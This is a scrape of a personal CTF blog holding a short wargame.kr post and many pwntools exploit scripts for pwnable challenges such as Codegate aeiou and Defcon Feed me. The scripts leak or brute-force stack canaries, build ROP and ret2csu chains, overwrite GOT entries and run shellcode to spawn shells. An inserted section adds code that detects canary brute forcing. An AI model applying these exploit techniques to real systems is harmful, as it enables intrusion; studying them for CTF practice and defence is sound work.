After about a year I logged into wargame.kr again and found that around seven new problems had been added.

Among the new problems there was exactly one web challenge, so I had a look at it; it was so much fun that I almost pulled an all-nighter even though I had to go to work.

I originally meant to post a write-up, but maybe because it is a newly added problem there is not a single public write-up and there seem to be few solvers, so I'll post what I have written up later, once some write-ups are out.


  


Other posts in the 'Wargame > wargame.kr' category

wargame.kr pw crack  (0) 2018.05.10
wargame.kr counting query  (0) 2018.05.10
wargame.kr login with crypto! but..  (0) 2018.05.10
wargame.kr CustomOS  (0) 2018.05.10
wargame.kr DLL with notepad  (0) 2018.05.09

JeonYoungSin

A space for keeping notes

exploit.py

from pwn import *   # Python 2 pwntools script (str payloads)

p = process("./start")
e = ELF("./start")

# first send: 24 bytes plus the newline from sendline overwrite the canary's
# low null byte, so the program's output runs into the other 7 canary bytes
payload = "A"*(0x20-12)
payload += "B"*4

p.sendline(payload)
print(p.recvuntil("\n"))
canary = "\x00" + p.recv(7)   # restore the null low byte
print(p.recv())
sleep(0.2)

# gadgets in the static binary
pop_rax_rdx_rbx = 0x47a6e6
pop_rdi = 0x4005d5
pop_rsi = 0x4017f7
pop_rdx = 0x443776
syscall = 0x4003fc
binsh = "/bin/sh\x00"
read = 0x440300               # read() in the static binary

# second send: canary back in place, saved rbp, then the ROP chain
payload2 = "A"*(0x20-8)
payload2 += canary
payload2 += "C"*8

# read(0, bss, len(binsh)): store "/bin/sh" in .bss
payload2 += p64(pop_rdi)
payload2 += p64(0)
payload2 += p64(pop_rsi)
payload2 += p64(e.bss())
payload2 += p64(pop_rdx)
payload2 += p64(len(binsh))
payload2 += p64(read)

# execve(bss, 0, 0): rax = 59, rdx = 0, rsi = 0, rdi = bss
payload2 += p64(pop_rax_rdx_rbx)
payload2 += p64(59)
payload2 += p64(0)
payload2 += p64(0)
payload2 += p64(pop_rsi)
payload2 += p64(0)
payload2 += p64(pop_rdi)
payload2 += p64(e.bss())
payload2 += p64(syscall)

p.sendline(payload2)
print(p.recv())
sleep(0.2)
p.sendline("exit")   # leave the input loop so the function returns into the chain
p.send(binsh)        # consumed by the read() in the chain
p.interactive()


Other posts in the 'System > Pwnable Practice' category

Defcon CTF 2019 Speedrun 1,2  (0) 2019.08.01
Harekaze CTF 2019 Baby ROP 1,2  (0) 2019.08.01
Codegate 2019 CTF aeiou  (0) 2019.07.30
Codegate 2016 CTF Watermelon  (0) 2019.07.29
Defcon CTF 2016 Feed me  (0) 2019.07.29
exploit.py

from pwn import *   # Python 2 pwntools script (str payloads)

p = process("./aeiou")
e = ELF("./aeiou")
l = e.libc

# ret2csu: csu_1 pops rbx, rbp, r12, r13, r14, r15; csu_2 loads the three
# argument registers from r13/r14/r15 and calls [r12 + rbx*8].
# mode=1 adds the 8 junk bytes that csu_2's "add rsp, 8" skips before the
# next round of pops; the first chain follows csu_1 directly, so mode=0.
def csu_chain(addr,argv1,argv2,argv3,mode=1):
    payload = ""
    if mode!=0:
        payload += "A"*8
    payload += p64(0)        # rbx = 0
    payload += p64(1)        # rbp = 1 (loop runs once)
    payload += p64(addr)     # r12 = pointer to the function to call
    payload += p64(argv3)
    payload += p64(argv2)
    payload += p64(argv1)
    payload += p64(csu_2)
    return payload

binsh = "/bin/sh\x00"
csu_1 = 0x4026EA
csu_2 = 0x4026D0
ret = 0x400b29   # ret gadget for stack alignment

payload = "A"*0x1018
payload += p64(ret)
payload += p64(csu_1)
payload += csu_chain(e.got['read'],0,e.bss(),len(binsh),0)   # read(0, bss, 8)
payload += csu_chain(e.got['system'],e.bss(),0,0)            # system(bss)
padding = "A"*(6224-len(payload))   # pad to the length the program expects
payload += padding

p.sendlineafter(">>","3")
p.sendlineafter("number!\n",str(len(payload)))
p.sendline(payload)
p.sendline(binsh)   # consumed by the read() in the chain
p.interactive()

exploit.py

from pwn import *   # Python 2 pwntools script (str payloads)

p = process("./vuln")
e = ELF("./vuln")
l = e.libc

print(p.recvuntil("\n"))
p.sendline("youngsin")

# menu 1: add 99 entries so that slots 99 and 100 are reachable
for i in range(1,100):
    print(p.sendlineafter("\tselect\t|\t\n","1"))
    print(p.sendlineafter("music\t|\t","A"))
    print(p.sendlineafter("\tartist\t|\t","B"))

# menu 3: edit entries 99 and 100; entry 100's artist field is sent without a
# newline so nothing terminates it before the canary
for i in range(99,101):
    print(p.sendlineafter("\tselect\t|\t\n","3"))
    print(p.sendlineafter("select number\t|\t\n",str(i)))
    print(p.sendlineafter("music\t|\t","A"*19))
    if i==100:
        print(p.sendafter("artist\t|\t","F"*16+"12345"))
    else:
        print(p.sendlineafter("artist\t|\t","B"*24))

# menu 2: list entries; the 3 non-null canary bytes follow "12345"
print(p.sendlineafter("\tselect\t|\t\n","2"))
print(p.recvuntil("12345"))
canary = "\x00"+p.recv(3)

pppr = 0x080495ad          # pop; pop; pop; ret
binsh = "/bin/sh\x00"

payload = "A"*20
payload += canary
payload += "A"*12

# write(1, read@got, 4): leak read's libc address
payload += p32(e.plt['write'])
payload += p32(pppr)
payload += p32(1)
payload += p32(e.got['read'])
payload += p32(4)

# read(0, bss, 8): store "/bin/sh" in .bss
payload += p32(e.plt['read'])
payload += p32(pppr)
payload += p32(0)
payload += p32(e.bss())
payload += p32(len(binsh))

# read(0, read@got, 4): overwrite read's GOT entry with system
payload += p32(e.plt['read'])
payload += p32(pppr)
payload += p32(0)
payload += p32(e.got['read'])
payload += p32(4)

# read@plt now resolves to system -> system(bss)
payload += p32(e.plt['read'])
payload += "A"*4
payload += p32(e.bss())

# write the chain into entry 100, then menu 4 (exit) returns into it
print(p.sendlineafter("\tselect\t|\t\n","3"))
print(p.sendlineafter("select number\t|\t\n","100"))
print(p.sendlineafter("music\t|\t","A"*19))
print(p.sendafter("artist\t|\t",payload))
print(p.sendlineafter("\tselect\t|\t\n","4"))
print(p.recvuntil("BYE\n\n"))

read_addr = u32(p.recv(4).ljust(4,"\x00"))
libc_base = read_addr - l.symbols['read']
system_addr = libc_base + l.symbols['system']

p.send(binsh)                  # consumed by read(0, bss, 8)
p.sendline(p32(system_addr))   # consumed by read(0, read@got, 4)
p.interactive()



exploit.py

from pwn import *   # Python 2 pwntools script (str payloads)

p = process("./feedme")
e = ELF("./feedme")

# byte-at-a-time canary brute force: the server forks per request, so every
# child has the same canary and a wrong guess only kills the child
canary = ""
p.recvuntil("FEED ME!\n")
for j in range(0,4):
    for i in range(0,256):
        payload = "A"*0x20+canary+chr(i)
        p.send(chr(len(payload)))   # one length byte, then the data
        p.send(payload)
        result = p.recvuntil("FEED ME!\n")
        if not "stack smashing detected" in result:
            canary += chr(i)        # no abort: this byte is correct
            print(canary)
            break

print("Find Canary = " + canary)

# gadgets in the static 32-bit binary
syscall = 0x0806fa1e   # int 0x80
par = 0x080bb496       # pop eax; ret
pcpbr = 0x0806f371     # pop ecx; pop ebx; ret
pdr = 0x0806f34a       # pop edx; ret
bss = e.bss()
binsh = "/bin/sh\x00"

payload = "A"*0x20
payload += canary
payload += "A"*12

# read(0, bss, 8): eax = 3, ebx = 0, ecx = bss, edx = 8
payload += p32(par)
payload += p32(0x3)
payload += p32(pcpbr)
payload += p32(bss)
payload += p32(0)
payload += p32(pdr)
payload += p32(len(binsh))
payload += p32(syscall)

# execve(bss, 0, 0): eax = 11, ebx = bss, ecx = 0, edx = 0
payload += p32(par)
payload += p32(0xb)
payload += p32(pcpbr)
payload += p32(0)
payload += p32(bss)
payload += p32(pdr)
payload += p32(0)
payload += p32(syscall)

p.send(chr(len(payload)))
p.send(payload)
sleep(0.1)
p.send(binsh)   # consumed by the read() in the chain
p.interactive()



exploit.py

from pwn import *   # Python 2 pwntools script (str payloads)

p = process("./vuln")
e = ELF("./vuln")
l = e.libc

pr = 0x400753          # pop rdi; ret
main_start = 0x4006A9
one_gadget = [0x4f2c5, 0x4f322, 0x10a38c]   # one_gadget offsets for the target libc

# round 1: puts(puts@got) to leak libc, then return to main for a second overflow
payload = "A"*(0x40+8)
payload += p64(pr)
payload += p64(e.got['puts'])
payload += p64(e.plt['puts'])
payload += p64(main_start)

p.sendlineafter(">> ",payload)
p.recvuntil("!!\n")

puts_addr = u64(p.recv(6).ljust(8,"\x00"))
libc_base = puts_addr - l.symbols['puts']
one_addr = libc_base + one_gadget[1]

# round 2: return straight into the one_gadget
payload2 = "A"*(0x40+8)
payload2 += p64(one_addr)
p.sendlineafter(">> ",payload2)
p.interactive()



exploit.py

from pwn import *   # Python 2 pwntools script (str payloads)

p = process('./ropbaby')
e = ELF('./ropbaby')
libc = e.libc

pop_rdi_offset = 0x000000000002155f
gets_offset = libc.symbols['gets']
one_offset = [0x4f2c5, 0x4f322, 0x10a38c]   # one_gadget offsets for the target libc

# menu 2 prints the address of a libc symbol: ask for gets and derive the base
p.sendlineafter(': ', '2')
p.sendlineafter(': ', 'gets')
gets_addr = int(p.recvline().split(' ')[2], 16)

libc_base = gets_addr - gets_offset
one_addr = libc_base + one_offset[0]

# menu 3 takes a length and a buffer; 8 bytes of padding, then the return address
payload = 'A' * 8
payload += p64(one_addr)

p.sendlineafter(': ', '3')
p.sendlineafter(': ', str(len(payload)+1))
p.sendline(payload)

# menu 4 returns from the function, landing on the one_gadget
p.sendlineafter(': ', '4')
p.interactive()



mprotect_exploit.py

from pwn import *   # Python 2 pwntools script (str payloads)

p = process("./gets")

# functions and gadgets in the static 32-bit binary
read = 0x0806D5F0
mprotect = 0x0806E0F0
pppr = 0x80bacfe       # pop; pop; pop; ret
bss = 0x080eb000       # page-aligned address inside .bss
shellCode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"

payload = "A"*(0x18+4)

# read(0, bss, len(shellCode)): copy the shellcode into .bss
payload += p32(read)
payload += p32(pppr)
payload += p32(0)
payload += p32(bss)
payload += p32(len(shellCode))

# mprotect(bss, len(shellCode), PROT_READ|PROT_WRITE|PROT_EXEC)
payload += p32(mprotect)
payload += p32(pppr)
payload += p32(bss)
payload += p32(len(shellCode))
payload += p32(7)

# return into the now-executable .bss
payload += p32(bss)

p.sendlineafter("\n",payload)
sleep(0.1)
p.sendline(shellCode)   # consumed by the read() in the chain
p.interactive()


syscall_exploit.py

from pwn import *   # Python 2 pwntools script (str payloads)

p = process("./gets")

# functions and gadgets in the static 32-bit binary
gets_plt = 0x804f120
bss = 0x080eaf80
par = 0x080b81c6       # pop eax; ret
pbr = 0x080481c9       # pop ebx; ret
pcr = 0x080de955       # pop ecx; ret
pdr = 0x0806f02a       # pop edx; ret
syscall = 0x0806cc25   # int 0x80
binsh = "/bin/sh\x00"

payload = "A"*(0x18+4)

# gets(bss): read "/bin/sh" into .bss; the following "pop eax" discards the argument
payload += p32(gets_plt)
payload += p32(par)
payload += p32(bss)

# execve(bss, 0, 0): eax = 11, ebx = bss, ecx = 0, edx = 0
payload += p32(par)
payload += p32(0xb)
payload += p32(pbr)
payload += p32(bss)
payload += p32(pcr)
payload += p32(0)
payload += p32(pdr)
payload += p32(0)
payload += p32(syscall)

p.sendlineafter("\n",payload)
sleep(0.1)
p.sendline(binsh)   # consumed by gets()
p.interactive()



exploit.py

from pwn import *   # Python 2 pwntools script (str payloads)

# byte-at-a-time canary brute force: the canary is the same on every run of
# this binary, so each guess uses a fresh process and a crash means a wrong byte
canary = ""
for j in range(0,4):
    for i in range(0,256):
        p = process("./vuln")
        payload = "A"*0x20+canary+chr(i)
        print(p.recvuntil("> "))
        p.sendline(str(len(payload)))
        print(p.recvuntil("> "))
        p.send(payload)
        try:
            print(p.recvuntil("Stack"))   # "Stack Smashing Detected" -> wrong byte
        except:
            canary += chr(i)              # no abort message: this byte is correct
            break
        p.close()

print("Found Canary = " + canary)

p = process("./vuln")
print(p.recvuntil("> "))

win = 0x080486EB
payload = "A"*0x20
payload += canary
payload += "A"*(0xC+4)   # saved ebx/ebp up to the return address
payload += p32(win)

p.sendline(str(len(payload)))
print(p.recvuntil("> "))
p.send(payload)
print(p.recv(2048))
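Added example, not from the original posts or from any of the challenge binaries: the feedme and vuln brute-force scripts above both key on glibc's "stack smashing detected" abort message to learn the canary one byte at a time, which works against a forking server because every child inherits the parent's canary. From the defender's side that same message is the signal: a brute force costs up to 256 aborts per canary byte, so a dense run of stack-protector aborts from one program is far more likely to be a canary brute force than an ordinary crash. The script below is detection logic run over constructed sample log lines; the syslog-style line format and the host and program names are assumptions for the example.

```python
# Added example (not from the original post): detection logic for the signal a
# byte-at-a-time canary brute force leaves behind. Log format, host and program
# names are constructed for this example.
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed syslog-style line: "<ISO timestamp> <host> <program>[<pid>]: <message>"
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}) "
    r"(?P<host>\S+) (?P<prog>[^\s\[]+)\[(?P<pid>\d+)\]: (?P<msg>.*)$"
)
MARKER = "stack smashing detected"  # glibc prints this from __stack_chk_fail before aborting


def parse_line(line):
    """Return (timestamp, host, program, pid, message), or None if the line does not match."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    return (
        datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%S"),
        m.group("host"),
        m.group("prog"),
        int(m.group("pid")),
        m.group("msg"),
    )


def detect_bursts(lines, threshold=16, window_seconds=60):
    """Return one alert per (host, program) that logs `threshold` or more
    stack-protector aborts inside any sliding window of `window_seconds`.

    Guessing one canary byte takes up to 256 attempts and every wrong guess is
    one abort, so a brute force shows up as a dense run of aborts from one
    program, while an ordinary crash is a single event.
    """
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)  # (host, program) -> timestamps still inside the window
    alerted = set()
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or MARKER not in rec[4]:
            continue
        ts, host, prog, _pid, _msg = rec
        key = (host, prog)
        q = recent[key]
        q.append(ts)
        while q and ts - q[0] > window:  # drop events that fell out of the window
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)  # one alert per offender, not one per extra abort
            alerts.append({"host": host, "program": prog, "count": len(q),
                           "first": q[0], "last": ts})
    return alerts


def sample_log():
    """Constructed sample: a forking service aborting 20 times in 10 seconds
    (the brute-force pattern), two isolated crashes, and an unrelated line."""
    base = datetime(2019, 7, 29, 10, 0, 0)
    lines = []
    for i in range(20):
        ts = (base + timedelta(seconds=i // 2)).strftime("%Y-%m-%dT%H:%M:%S")
        lines.append("%s ctfbox feedme[%d]: *** stack smashing detected ***: ./feedme terminated"
                     % (ts, 4000 + i))
    lines.append("2019-07-29T09:00:00 ctfbox vuln[3000]: *** stack smashing detected ***: ./vuln terminated")
    lines.append("2019-07-29T11:30:00 ctfbox vuln[3100]: *** stack smashing detected ***: ./vuln terminated")
    lines.append("2019-07-29T10:00:03 ctfbox sshd[900]: Accepted publickey for user from 10.0.0.5")
    return lines


if __name__ == "__main__":
    for a in detect_bursts(sample_log()):
        print("ALERT %s/%s: %d stack-protector aborts between %s and %s"
              % (a["host"], a["program"], a["count"], a["first"], a["last"]))
```

A service that crash-loops under a supervisor trips the same rule, so in practice the alert is worth pairing with whatever parent-PID or restart information the real log carries. The root-cause fix on the server side is to stop handing untrusted input to children that share the parent's canary: re-exec per connection (or use a fresh process) so every guess faces a new random value.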



exploit.py

from pwn import *   # Python 2 pwntools script (str payloads)

p = process("./baskin")

write_plt = 0x4006d0
pppr = 0x40087a      # pop rdi; pop rsi; pop rdx; ret
read_plt = 0x400700
read_got = 0x602040
bss = 0x0000000000602090
distance = 0x7f01512ac070 - 0x7f01511eb440   # read - system, taken from the target libc at runtime
binsh="/bin/sh\x00"

payload = "A"*(0xb0+8)

# write(1, read@got, 8): leak read's libc address
payload += p64(pppr)
payload += p64(1)
payload += p64(read_got)
payload += p64(8)
payload += p64(write_plt)

# read(0, bss, 8): store "/bin/sh" in .bss
payload += p64(pppr)
payload += p64(0)
payload += p64(bss)
payload += p64(len(binsh))
payload += p64(read_plt)

# read(0, read@got, 8): overwrite read's GOT entry with system
payload += p64(pppr)
payload += p64(0)
payload += p64(read_got)
payload += p64(8)
payload += p64(read_plt)

# read@plt now resolves to system -> system(bss); rsi/rdx are don't-care
payload += p64(pppr)
payload += p64(bss)
payload += "A"*16
payload += p64(read_plt)

print(p.recvuntil("(1-3)\n"))

p.sendline(payload)
print(p.recvuntil("Don't break the rules...:( \n"))

read = u64(p.recv(8))
system = p64(read-distance)
p.send(binsh)         # consumed by read(0, bss, 8)
sleep(0.5)
p.sendline(system)    # consumed by read(0, read@got, 8)
p.interactive()

